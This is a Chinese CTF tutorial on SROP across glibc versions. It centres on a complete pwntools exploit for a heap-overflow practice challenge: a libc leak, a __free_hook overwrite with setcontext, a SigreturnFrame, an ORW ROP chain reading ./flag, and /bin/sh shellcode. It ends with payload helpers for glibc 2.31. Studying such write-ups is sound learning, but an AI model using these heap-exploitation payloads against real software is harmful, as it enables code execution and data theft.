SROP专题

一、什么是srop？有什么用？

srop技术用来还原系统调用前的寄存器信息，那么我们可以伪造寄存器的值实现函数调用利用~简单理解成类似栈溢出劫持控制流。

在CTF中最常和orw的题目相结合。

二、不同ubuntu版本下的srop的使用技巧

1、16.04（glibc2.23）

这里简单拿一道题示范一下:

题目本身不难，就一个堆任意溢出，但是作为复习的话，用不同的方法去把它打出来，打法也是比较常规，先io_file泄露地址，然后unsortedbin 往free_hook上方写一个0x7f的size头，然后申请出来free_hook，记得\x00填充，接着改成setcontext+53，然后就是srop的操作了，写入orw的rop链子然后一把嗖。

# -*- coding: utf-8 -*-
from pwn import *
from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 1
elf = ELF('./easyheap')
if local:
    p = process('./easyheap')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',28710)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))


def malloc(size,content):
    ru("Your choice :")
    sl('1')
    ru("Size of Heap : ")
    sl(str(size))
    ru("Content of heap:")
    sd(content)
def free(index):
    ru("Your choice :")
    sl('3')
    ru("Index :")
    sl(str(index))
def edit(index,size,content):
    ru("Your choice :")
    sl('2')
    ru("Index :")
    sl(str(index))
    ru("Size of Heap : ")
    sl(str(size))
    ru("Content of heap : ")
    sd(content)
def backdoor():
    ru("Your choice :")
    sl('4869')

malloc(0x100,'ff')
malloc(0x68,'fff')
malloc(0x68,'hhh')
malloc(0x68,'ff')
malloc(0xf8,'fff')
malloc(0x20,'gv')
free(0)
py = ''
py += 'a'*0x60
py += p64(0x260) + '\x00'
edit(3,0x69,py)
free(4)
malloc(0x100,'gg')
malloc(0x68,'g')
malloc(0x68,'v')
malloc(0x68,'v')
malloc(0xf8,'g')
free(1)
free(2)
edit(6,1,p8(0xf0))
edit(3,2,'\xdd\x25')
malloc(0x68,'aa')
malloc(0x68,'aa')
py = ''
py += '\x00'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00'
malloc(0x68,py)
rc(0x40)
magic = 0x0000000006020C0
libc_base = u64(rc(6).ljust(8,'\x00'))-0x3c5600
print "libc_base--->" + hex(libc_base)
malloc_hook = libc_base + libc.sym["__malloc_hook"]
fake_chunk = malloc_hook - 0x23
onegadget = libc_base + one64[1]
free_plt = libc_base + libc.sym["free"]
realloc = libc_base + libc.sym["realloc"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
binsh = libc_base + libc.search("/bin/sh").next()
setcontext = libc_base + libc.sym["setcontext"]
fake_chunk2 = free_hook-0x20
free(0)
free(1)
free(2)
free(4)
free(5)
free(6)
free(7)
free(8)

malloc(0x68,'\x00'*8)
malloc(0x68,'\x00'*8)
malloc(0x68,'\x00'*8)
malloc(0x68,'\x00'*8)
malloc(0x20,'\x00')
malloc(0x100,'bbbb')

py = ''
py += 'v'*0x60
py += p64(0x0) + p64(0x101)
py += p64(0) + p64(fake_chunk2)
edit(0,0x80,py)
malloc(0xf8,'gg')
fake_chunk3 = free_hook-0x13
free(0)
py = ''
py += p64(fake_chunk3)
edit(3,8,py)
malloc(0x68,'gg')
malloc(0x68,'\x00'*3+p64(setcontext+53))

pop_rdi_ret = 0x0000000000021112+libc_base
pop_rdx_rsi_ret = 0x0000000000115189+libc_base
syscall = 0x00000000000bc3f5 + libc_base
pop_rax_ret = 0x000000000003a738+libc_base
leave_ret = 0x0000000000400b8c

frame = SigreturnFrame()#read(0,free_hook,0x1000) syscall
frame.rdi = 0
frame.rsi = free_hook#rdi+0x70
frame.rdx = 0x1000#rdi+0x50
frame.rsp = free_hook#ret
frame.rip = syscall#rsp->rip
a = len(str(frame))
print "length--->" + hex(a)
edit(6,0x100,str(frame))

def orw_pay(flag_addr,addr):
	py = ''
	py += p64(pop_rdi_ret)
	py += p64(flag_addr)
	py += p64(pop_rdx_rsi_ret)
	py += p64(0)
	py += p64(0)
	py += p64(pop_rax_ret)
	py += p64(2)
	py += p64(syscall)
	py += p64(pop_rdi_ret)
	py += p64(3)
	py += p64(pop_rdx_rsi_ret)
	py += p64(0x80)
	py += p64(addr)
	py += p64(pop_rax_ret)
	py += p64(0)
	py += p64(syscall)
	py += p64(pop_rdi_ret)
	py += p64(1)
	py += p64(pop_rax_ret)
	py += p64(1)
	py += p64(syscall)
	py += "./flag\x00\x00"
	return py

# debug(0x00400BE0,0)
payload = orw_pay(free_hook+0xa8,free_hook+0x100)
free(6)
sleep(0.1)
sl(payload)
# i = 0
# while 1:
#     print i
#     i += 1
#     try:
#         pwn()
#     except EOFError:
#         p.close()
#         local = 1
#         elf = ELF('./note_five')
#         if local:
#             p = process('./note_five')
#             libc = elf.libc
#             continue
#         else:
#             p = remote('121.40.246.48',9999)
#             libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#     else:
#         sl("ls")
#         break
p.interactive()

2、18.04（glibc2.27）

3、19.04（glibc2.29）

4、20.04（glibc2.31）

在ubuntu20.04中，我们依赖的setcontext函数的参数已经发生了变化，由rdi变为了rdx，从源码和汇编的角度可以知道：

这里可以知道从cmp那里开始，也就是setcontext+33的位置，同时我们需要将rdi转成rdx，这里通过ropper找到一条好用的gadget：

1	ropper --file libc-2.31.so --search "mov rdx"

得到一条好用的gadget，我们成为magic_gadget:

1	0x0000000000154930: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

这里本身自带的srop的payload用不了，我直接自己手撕了一个傻瓜式payload，用法更简单，封装了一个函数，自己先计算好偏移即可，因为最后是系统调用read函数读入orw的payload到栈上，然后再ret栈上的内容，所以直接只需要传入srop的payload开始的堆地址即可，这里要求堆块的大小至少为0xe8大小。

def srop_pay(start_addr):
    pay = ''
    pay += p64(0) + p64(start_addr)
    pay = pay.ljust(0x20,'\x00')
    pay += p64(setcontext+33)
    pay = pay.ljust(0x68,'\x00')
    pay += p64(0)
    pay += p64(start_addr)
    pay += p64(0)
    pay += p64(0)
    pay += p64(0x110)
    pay = pay.ljust(0xa0,'\x00')
    pay += p64(start_addr)
    pay += p64(syscall_ret)
    pay = pay.ljust(0xe0,'\x00')
    pay += p64(start_addr)
    return pay

关于orw，我也写了一个2.31下的专有封装函数：

def orw_pay():
    pay = ''
    pay += p64(pop_rdi_ret)
    pay += p64(pay_start+0x100)
    pay += p64(pop_rsi_ret)
    pay += p64(0)
    pay += p64(pop_rax_ret)
    pay += p64(0x2)
    pay += p64(syscall_ret)
    pay += p64(pop_rdi_ret)
    pay += p64(3)
    pay += p64(pop_rsi_ret)
    pay += p64(heap_addr)
    pay += p64(pop_rdx_r12_ret)
    pay += p64(0x40)
    pay += p64(0)
    pay += p64(pop_rax_ret)
    pay += p64(0x0)
    pay += p64(syscall_ret)
    pay += p64(pop_rdi_ret)
    pay += p64(1)
    pay += p64(pop_rsi_ret)
    pay += p64(heap_addr)
    pay += p64(pop_rdx_r12_ret)
    pay += p64(0x40)
    pay += p64(0)
    pay += p64(pop_rax_ret)
    pay += p64(0x1)
    pay += p64(syscall_ret)
    pay = pay.ljust(0x100,'a')
    pay += './flag\x00\x00'
    return pay